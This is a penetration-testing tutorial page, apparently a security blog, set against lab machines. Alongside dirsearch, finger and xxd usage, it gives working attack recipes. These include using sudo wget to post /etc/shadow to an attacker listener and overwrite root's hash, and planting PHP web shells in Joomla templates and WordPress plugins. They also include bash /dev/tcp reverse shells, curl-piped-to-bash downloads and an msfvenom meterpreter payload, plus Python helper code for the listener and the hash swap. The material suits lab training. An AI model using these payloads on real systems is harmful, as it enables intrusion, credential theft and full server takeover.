dirsearch how-to

dirsearch is a simple command line tool designed to brute force directories and files in websites.

https://github.com/maurosoria/dirsearch

Installation

1. Download the source code

  • git clone https://github.com/maurosoria/dirsearch.git
  • ls
  • cd dirsearch/
  • ls

2. Run the program (it needs Python 3; install the dependencies listed in the repository's requirements.txt first)

  • ./dirsearch.py
  • python3 dirsearch.py

How to use

1. Display the help menu

  • ./dirsearch.py --help

Search

-w = Wordlist(s) to use (comma-separated if more than one)

-e = Extension list separated by comma (Example: php,asp)

-u = URL to scan

  • ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -u http://bank.htb

2. Scanning a list of URLs (-L = file with one URL per line)

  • ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -L url_list.txt

3. Using predefined list of extensions

-E = Use predefined list of common extensions

  • ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

4. Enable recursion and force extensions

-f = Force extensions for every wordlist entry

-r = Bruteforce recursively

  • ./dirsearch.py -rf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

Set the level of recursion

-R = Max recursion level (subdirs) (Default: 1 [only rootdir + 1 dir])

  • ./dirsearch.py -r -R 3 -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

5. Setting the number of threads (raising it speeds the scan up but adds load and noise on the target; not recommended unless you know the target tolerates it)

-t = Number of threads

  • ./dirsearch.py -rf -t 5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

6. Excluding status codes

-x = Exclude status codes, separated by comma (example: 301,500). The example below excludes 200 responses; in practice you more often exclude the codes the target returns for everything, such as 403 or a catch-all 301/302.

  • ./dirsearch.py -rf -x 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

7. Set a cookie, and send the requests to BurpSuite

--proxy=127.0.0.1:8080 = HTTP proxy (example: localhost:8080)

-c = Set a cookie

  • ./dirsearch.py -rf -c HTBBankAuth=cfj5qnhq8br2si58l7pm9q5j56 --proxy=127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

8. Spoofing User-Agent

--ua = User agent text

  • ./dirsearch.py -rf --ua="Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" --proxy=127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

9. Use a different method for the scan

--http-method = Method to use, default: GET, possible also: HEAD;POST

  • ./dirsearch.py -rf --http-method=POST --proxy=127.0.0.1:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

10. Follow redirects

-F = follow redirects

  • ./dirsearch.py -F -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt

11. Writing results to a file

  • ./dirsearch.py --plain-text-report=result.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E -L url_list.txt
  • cat result.txt
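The options above are easier to reason about once you see the loop behind them. The following is an added example, not dirsearch's own code: a simplified model of what -w/-e/-f/-r/-R/-x do (candidate generation from the wordlist and extensions, recursion into directories up to a depth, status-code exclusion), run against a constructed in-memory site so it executes offline. The site map, the wordlist and the fake_fetch function are assumptions made for the example; swap fake_fetch for a real HTTP request to use it against a live target.

```python
"""Added example, not dirsearch's own code: a simplified model of the
-w/-e/-f/-r/-R/-x logic, run against a constructed in-memory site."""
from typing import Callable, Dict, Iterable, List, Set

# Constructed sample target: path -> status the server would answer.
SITE: Dict[str, int] = {
    "/index.php": 200,
    "/admin": 301,               # directory: server redirects to /admin/
    "/admin/login.php": 200,
    "/admin/backup": 301,
    "/admin/backup/db.sql": 200,
    "/uploads": 301,
}


def fake_fetch(path: str) -> int:
    """Stand-in for the HTTP request; unknown paths answer 404."""
    return SITE.get(path, 404)


def candidates(words: Iterable[str], extensions: List[str], force: bool = False) -> List[str]:
    """Expand a wordlist the way -e/-f do.

    Entries containing %EXT% get one copy per extension; with force=True (-f)
    every plain entry is tried bare and with each extension; otherwise plain
    entries are tried as-is.  Modelled on dirsearch's documented behaviour.
    """
    out: List[str] = []
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):
            continue
        if "%EXT%" in word:
            out.extend(word.replace("%EXT%", ext) for ext in extensions)
        elif force:
            out.append(word)
            out.extend(f"{word}.{ext}" for ext in extensions)
        else:
            out.append(word)
    return out


def brute_force(fetch: Callable[[str], int], words: Iterable[str], extensions: List[str],
                *, force: bool = False, recursive: bool = False, max_depth: int = 1,
                exclude: Set[int] = frozenset({404})) -> Dict[str, int]:
    """Return {path: status} for every non-excluded response.

    recursive/max_depth mirror -r/-R: the root is depth 0 and a directory
    found at depth d is scanned only while d < max_depth, so the default
    max_depth=1 scans the root plus one level of subdirectories.  A 301/302
    on a bare name is taken as 'this is a directory' (the trailing-slash
    redirect), which is also why excluding 301 with -x silently disables
    recursion.
    """
    names = candidates(words, extensions, force)
    found: Dict[str, int] = {}
    queue: List[tuple] = [("/", 0)]
    seen: Set[str] = {"/"}
    while queue:
        base, depth = queue.pop(0)
        for name in names:
            path = base + name
            status = fetch(path)
            if status in exclude:
                continue
            found[path] = status
            subdir = path + "/"
            if recursive and depth < max_depth and status in (301, 302) and subdir not in seen:
                seen.add(subdir)
                queue.append((subdir, depth + 1))
    return found


if __name__ == "__main__":
    words = ["admin", "backup", "login", "index", "uploads", "db"]
    hits = brute_force(fake_fetch, words, ["php", "sql"], force=True, recursive=True, max_depth=2)
    for path, status in sorted(hits.items()):
        print(f"[{status}] {path}")
```

Running it with recursion depth 2 finds /admin/backup/db.sql; with the default depth 1 it stops at /admin/login.php and /admin/backup, and excluding 301 with -x leaves only /index.php because the directory hints are thrown away before recursion can use them.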

wget – Privilege Escalation

wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies.

If wget can be run as root (for example through a sudo rule), it can be abused to read and write arbitrary files. Check with:

  • sudo -l

Hacking steps

1. wget can read local files and send their content over the network: with a netcat listener on the attacking machine, --post-file delivers the contents of sensitive files to us

Local machine

  • nc -lvp 80

Remote machine

  • sudo /usr/bin/wget --post-file=/etc/passwd 10.10.14.21

Running that command sends the file content to our netcat listener as the body of an HTTP POST.

2. Doing the same with /etc/shadow reveals the password hashes. Since wget running as root can also write files (-O), we can then overwrite /etc/shadow with a modified copy.

We save the contents of the output in a file named shadow in the local machine

  • vi shadow
  • cat shadow

3. Update the root line with the existing hash of a known user, sammy, whose password we already know. A hash you generate yourself in a format the target's crypt supports (for example with openssl passwd) works just as well.

root:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:14146::::::

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

4. Now download the file and write the output to /etc/shadow

Local machine

  • python -m SimpleHTTPServer 9999

Remote machine

-O = write the downloaded content to the given file; because wget runs as root, it can overwrite /etc/shadow

  • sudo wget 10.10.14.21:9999/shadow -O /etc/shadow

5. Read /etc/shadow on the remote machine again to confirm it has been overwritten

Local machine

  • nc -lvp 80

Remote machine

  • sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.21

Output in netcat

The file has been updated: the root hash now differs from the one we saw at the beginning (it is sammy's hash).

6. Try elevating privileges

  • su -
  • password: cooldude!
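What the netcat listener shows is a raw HTTP request, and the shadow edit of step 3 is a field swap in a colon-separated file. The following is an added example, not from the page, that makes both explicit in Python: parse_post() extracts the posted file from the request that `wget --post-file=FILE HOST` emits, swap_hash() builds the edited shadow file (the target account gets the hash of an account whose password is known) without touching any other field, and listen_once() is an optional replacement for `nc -lvp PORT` that parses the request and acknowledges it so wget exits cleanly. The sample request is constructed: the sammy hash is the one on the page, the root hash and the wget version string are placeholders.

```python
"""Added example, not from the page: receiver side of `wget --post-file`
and the shadow-file hash swap, with a constructed sample request."""
import socket
from typing import Dict, Tuple


def parse_post(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x request into (request line, headers, body).

    wget sends the file with a Content-Length header, so the body is exactly
    that many bytes after the blank line.  Raises ValueError while the
    request is still incomplete (no blank line yet, or body still short).
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: end of headers not seen yet")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    if len(rest) < length:
        raise ValueError(f"short body: {len(rest)} of {length} bytes")
    return lines[0], headers, rest[:length]


def swap_hash(shadow: str, target: str, source: str) -> str:
    """Return shadow text with target's hash (field 2) replaced by source's.

    /etc/shadow lines are name:hash:lastchg:min:max:warn:inactive:expire:flag;
    only the hash field of the target line is changed.
    """
    rows = [line.split(":") for line in shadow.splitlines() if line.strip()]
    by_name = {row[0]: row for row in rows}
    if target not in by_name or source not in by_name:
        raise KeyError("target or source account missing from shadow file")
    if not by_name[source][1].startswith("$"):
        raise ValueError(f"{source} has no usable hash (locked or empty)")
    by_name[target][1] = by_name[source][1]
    return "\n".join(":".join(row) for row in rows) + "\n"


def listen_once(port: int, bind: str = "0.0.0.0") -> bytes:
    """Accept one wget POST (what `nc -lvp PORT` does) and return the posted file."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            buf = b""
            while True:
                chunk = conn.recv(65536)
                if not chunk:
                    raise ValueError("peer closed before the request was complete")
                buf += chunk
                try:
                    body = parse_post(buf)[2]
                except ValueError:
                    continue            # need more bytes
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
                return body


# Constructed sample of what the listener sees for
# `sudo wget --post-file=/etc/shadow 10.10.14.21` (root hash is a placeholder).
SAMPLE_BODY = (
    b"root:$6$placeholder$ORIGINALROOTHASH:14146::::::\n"
    b"sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::\n"
)
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"User-Agent: Wget/1.19.4 (linux-gnu)\r\n"
    b"Accept: */*\r\n"
    b"Host: 10.10.14.21\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
    + b"\r\n" + SAMPLE_BODY
)

if __name__ == "__main__":
    _, _, body = parse_post(SAMPLE_REQUEST)
    print(swap_hash(body.decode(), "root", "sammy"), end="")
```

The ValueError on a short body matters for the real listener: netcat just prints whatever arrives, while listen_once keeps reading until Content-Length bytes are in, so a large file split across several TCP segments is not truncated.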

 

79/tcp finger – Enumeration

Finger is primarily used to enumerate user accounts on the target system. Where the information is present it also reveals details such as full name, e-mail address, phone number, home directory and last login of those users.

Nmap result

finger-user-enum

finger-user-enum is a script used to enumerate users

https://github.com/pentestmonkey/finger-user-enum

Username guessing tool primarily for use against the default Solaris finger service.

Installation

  • git clone https://github.com/pentestmonkey/finger-user-enum.git
  • ls -l finger-user-enum

Using finger-user-enum

1. Displaying help

  • perl finger-user-enum.pl -h

2. Enumerate a single user

-u = user

-t = host IP

  • perl finger-user-enum.pl -u root -t 10.10.10.76

The root query returns output, which means the user exists (1 result). A query for a user that does not exist returns 0 results:

  • perl finger-user-enum.pl -u vry4n -t 10.10.10.76

3. Enumerate users using a list

  • perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

4. Using a list of IPs

  • perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -T IP_list.txt

5. Using another port than default 79

  • perl finger-user-enum.pl -p 8000 -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

6. Showing detailed output

  • perl finger-user-enum.pl -d -u root -t 10.10.10.76

Metasploit

1. Metasploit has a module for finger scan (auxiliary/scanner/finger/finger_users)

  • use auxiliary/scanner/finger/finger_users
  • show options
  • set RHOSTS 10.10.10.76
  • set USERS_FILE /usr/share/seclists/Usernames/Names/names.txt
  • exploit

Using finger

Finger is a tool used to enumerate users using port 79. Finger may be used to look up users on a remote machine. The format is to specify a user as “user@host”, or “@host”

1. Display man page for help

  • man finger

2. Enumerate a known user, in this case root (-s = short, one-line format)

  • finger -s root@10.10.10.76

3. Show the long format (home directory, shell, last login, .plan) for the user

  • finger -sl root@10.10.10.76

4. Preventing the -l option from displaying the contents of the “.plan”, “.project” and “.pgpkey” files.

  • finger -slp sammy@10.10.10.76
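Both finger-user-enum and the finger client above speak the same tiny protocol: open TCP/79, send the user name (prefixed with "/W " for the long format) followed by CRLF, and read until the server closes. The following is an added example, not finger-user-enum's or finger's own code: a minimal client for that exchange plus the per-reply decision the enumeration tool makes (does this reply describe a real account?). user_exists() is a heuristic and an assumption on my part, not the tool's exact rule set, and the reply samples are constructed, modelled on Solaris and GNU finger output; fake_query lets the enumeration loop run offline against them.

```python
"""Added example, not finger-user-enum's or finger's code: RFC 1288 client
and the exists/does-not-exist decision, with constructed reply samples."""
import re
import socket
from typing import Callable, Iterable, List

LOGIN_LINE = re.compile(r"^\s*login(?: name)?:", re.IGNORECASE | re.MULTILINE)


def finger_query(host: str, user: str, port: int = 79, long: bool = False,
                 timeout: float = 5.0) -> str:
    """Send one finger request and return the reply text.

    An empty user sends a bare CRLF, which asks for the logged-in user list
    (what `finger @host` does).  long=True sends "/W user", the -l format.
    """
    query = ("/W " + user if long and user else user) + "\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(query.encode("ascii"))
        chunks: List[bytes] = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


def user_exists(reply: str) -> bool:
    """Classify a finger reply (heuristic, an assumption of this example).

    Negative signals: empty reply, 'no such user' (GNU/BSD finger) or a
    '???' real name (Solaris answers unknown users with 'In real life: ???').
    Positive signal: a 'Login:' / 'Login name:' line without those markers.
    """
    text = reply.strip()
    if not text or "???" in text or "no such user" in text.lower():
        return False
    return LOGIN_LINE.search(text) is not None


def enumerate_users(host: str, names: Iterable[str],
                    query: Callable[[str, str], str] = finger_query) -> List[str]:
    """finger-user-enum's -U loop: try each name, keep the ones that exist."""
    hits: List[str] = []
    for name in names:
        name = name.strip()
        if name and user_exists(query(host, name)):
            hits.append(name)
    return hits


# Constructed replies (Solaris-style for root/sammy/vry4n, GNU finger for nobody2).
SAMPLE_REPLIES = {
    "root": ("Login name: root                        In real life: Super-User\n"
             "Directory: /                            Shell: /sbin/sh\n"
             "Last login Tue Dec  3 10:17 on pts/1\n"
             "No unread mail\nNo Plan.\n"),
    "sammy": ("Login name: sammy                       In real life: Sammy\n"
              "Directory: /export/home/sammy           Shell: /bin/bash\n"
              "Never logged in.\nNo unread mail\nNo Plan.\n"),
    "vry4n": "Login name: vry4n                       In real life: ???\n",
    "nobody2": "finger: nobody2: no such user.\n",
}


def fake_query(host: str, user: str) -> str:
    """Offline stand-in for finger_query using the constructed replies."""
    return SAMPLE_REPLIES.get(user, "")


if __name__ == "__main__":
    print(enumerate_users("10.10.10.76", SAMPLE_REPLIES, query=fake_query))
```

Against a real host, call enumerate_users("10.10.10.76", open("names.txt")) and it reads the wordlist line by line, one connection per name, which is exactly why the tool is slow and noisy on large lists.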

Using xxd Linux command

xxd creates a hex dump of a given file or standard input. It can also convert a hex dump back to its original binary form.

Usage

Displaying available options

  • xxd --help

  • man xxd

1. Converting a file to hex

  • cat vk9-file.txt
  • file vk9-file.txt

2. run xxd

  • xxd vk9-file.txt

3. Seeking to an offset (-s). With the default 16 bytes per line, -s 0x10 skips the first line

  • xxd -s 0x10 vk9-file.txt

A negative offset counts back from the end of the file, so -s -0x10 shows only the last 16 bytes (the last line) rather than omitting it

  • xxd -s -0x10 vk9-file.txt

4. Limit the length (-l): print the first 0x10 = 16 bytes

  • xxd -l 0x10 vk9-file.txt

5. Set the number of bytes per output line (-c), here 2 bytes per line

  • xxd -c 2 vk9-file.txt

6. Producing binary dump

  • xxd -b vk9-file.txt

7. Reverting from Hex

  • xxd vk9-file.txt > vk9.hex
  • cat vk9.hex
  • xxd -r vk9.hex
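The seek, length, column and reverse options are easy to misread (a negative -s in particular), so here is an added example, not part of the page or of xxd itself, that implements those behaviours in Python on a constructed 32-byte sample so the exact semantics can be checked: hexdump() covers -s (including a negative seek counted back from the end), -l and -c; reverse() covers -r, honouring the offset on each line. The -b bit-dump format is not modelled, and the two-space separator before the ASCII column is an assumption about the layout.

```python
"""Added example, not xxd's code: -s/-l/-c dump and -r reverse in Python."""
from typing import Optional


def hexdump(data: bytes, seek: int = 0, length: Optional[int] = None, cols: int = 16) -> str:
    """xxd-style dump: 8-digit hex offset, bytes in groups of two, ASCII column.

    seek < 0 counts back from the end of the data, so seek=-0x10 prints the
    *last* 16 bytes (it does not drop them).  length caps the number of
    bytes dumped, like -l; cols is the number of bytes per line, like -c.
    """
    start = seek if seek >= 0 else max(len(data) + seek, 0)
    end = len(data) if length is None else min(start + length, len(data))
    hex_width = cols * 2 + (cols + 1) // 2 - 1      # full hex field incl. group spaces
    lines = []
    for off in range(start, end, cols):
        chunk = data[off:min(off + cols, end)]
        hexpart = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexpart:<{hex_width}}  {text}")
    return "\n".join(lines) + ("\n" if lines else "")


def reverse(dump: str) -> bytes:
    """Turn hexdump()/xxd output back into bytes, like xxd -r.

    Each line's bytes are written at the offset the line declares; gaps
    (e.g. a dump made with -s 0x10) are zero-filled, which is also the
    effect of `xxd -r` writing into a new file.
    """
    out = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        offset_str, _, rest = line.partition(":")
        offset = int(offset_str, 16)
        # the hex field ends at the first double space (padding/ASCII separator)
        chunk = bytes.fromhex(rest.split("  ", 1)[0].replace(" ", ""))
        if len(out) < offset:
            out.extend(b"\x00" * (offset - len(out)))
        out[offset:offset + len(chunk)] = chunk
    return bytes(out)


# Constructed 32-byte sample file (two full 16-byte rows).
SAMPLE = b"vk9-security.com\nhello from xxd\n"

if __name__ == "__main__":
    print(hexdump(SAMPLE), end="")
    print(hexdump(SAMPLE, seek=-0x10), end="")      # only the last row
    assert reverse(hexdump(SAMPLE, cols=2)) == SAMPLE
```

On the sample, hexdump(SAMPLE, seek=0x10) and hexdump(SAMPLE, seek=-0x10) produce the same single row at offset 00000010, which is the point the -s section above makes.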

 

Reverse shell on any CMS

This trick works on any CMS whose admin console lets you edit server-side files, once you have credentials (obtained by brute force, disclosure, etc.). This example uses Joomla! CMS.

Joomla Reverse shell

1. Having access to the account and being able to edit the template

  • Go to Extensions – Templates – Templates

2. Select the template to use, in this case “Protostar Details and Files”

  • Click on New File

  • Choose a file name: vk9-sec
  • Choose the extension: php

  • Click on Create

3. Create a PHP script to accept remote commands

  • <?php echo "Follow us." ?>
  • <?php echo shell_exec($_GET['cmd']); ?>
  • Click save

4. Locate the vk9-sec.php page, in our case it is under /templates/protostar/vk9-sec.php

5. We know the PHP file is working, now we will enter the GET request via URL using the variable ‘cmd’

  • http://10.10.10.150/templates/protostar/vk9-sec.php?cmd=whoami

6. Let's execute a remote file with a netcat reverse shell

  • start a netcat listener on port 4444 (the port used in the payload below) in Kali/Parrot

Create a file with the command

  • echo "bash -i >& /dev/tcp/10.10.14.4/4444 0>&1" > vk9_reverse.sh
  • cat vk9_reverse.sh

Start a Python web server on the attacking machine so the target can download the file

  • python -m SimpleHTTPServer 9999

Now, through the 'cmd' variable of vk9-sec.php, download vk9_reverse.sh with curl and pipe it into bash (the browser URL-encodes the spaces and the pipe as %20 and %7C; do the same if you send the request with curl or a script)

  • http://10.10.10.150/templates/protostar/vk9-sec.php?cmd=curl 10.10.14.4:9999/vk9_reverse.sh | bash

Looking at the listener, we get a remote connection

Python web server logs

Reverse shell WordPress & Metasploit

1. With an active admin session in WordPress, we can edit the theme source and inject code that runs whatever we want when the page is requested.

  • Appearance -> Editor
  • I chose "index.php"

2. To test, inject a simple PHP snippet into index.php. The page should show the text and, through the 'cmd' variable, the output of a shell command

  • <?php echo "Vry4n" ?>
  • <?php echo shell_exec($_GET['cmd']); ?>

3. Capturing the traffic with BurpSuite we will analyze the server responses

  • First picture, we will just see string in the source code ‘Vry4n’

  • The second time we will visit (http://192.168.0.17/0/index.php?cmd=id)

4. Knowing we can print to the page and execute commands, we can proceed with the reverse connection.

Reverse Shell

1. From the attacking machine, we will generate a payload using MSFVenom, this will be in PHP language as the site has many PHP scripts already coded

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.13 LPORT=443 -f raw

2. Copy this code to the editor in WordPress

3. Start a listener in Metasploit

  • sudo msfdb init
  • sudo msfconsole
  • use exploit/multi/handler
  • set payload php/meterpreter/reverse_tcp
  • set LHOST 192.168.0.13
  • set LPORT 443
  • exploit

4. Now execute the script by visiting /index.php in the browser

  • http://192.168.0.17/0/index.php

5. The connection should show up now in Metasploit listener

WordPress Plugin editor

Having already access to CMS admin console. You could modify a plugin code and inject whatever you want.

1. Go to Plugins – Editor

2. Locate the script you want to modify and add the code. I used akismet; plugins are usually stored under /wp-content/plugins

  • <?php echo "Vry4n" ?>
  • <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.13/443 0>&1'"); ?>

3. Now visit the plugin from the browser, as you can see, the string “Vry4n” displays as the first line echoes it

  • http://192.168.0.14/wp-content/plugins/akismet/akismet.php

4. We can now try a reverse shell. Start a netcat listener in your local machine

  • nc -lvp 443

5. The second line requests the reverse shell, so reload the page: the connection shows up on the listener, and the browser request stays open for as long as the shell lives, because exec() waits for the command to finish.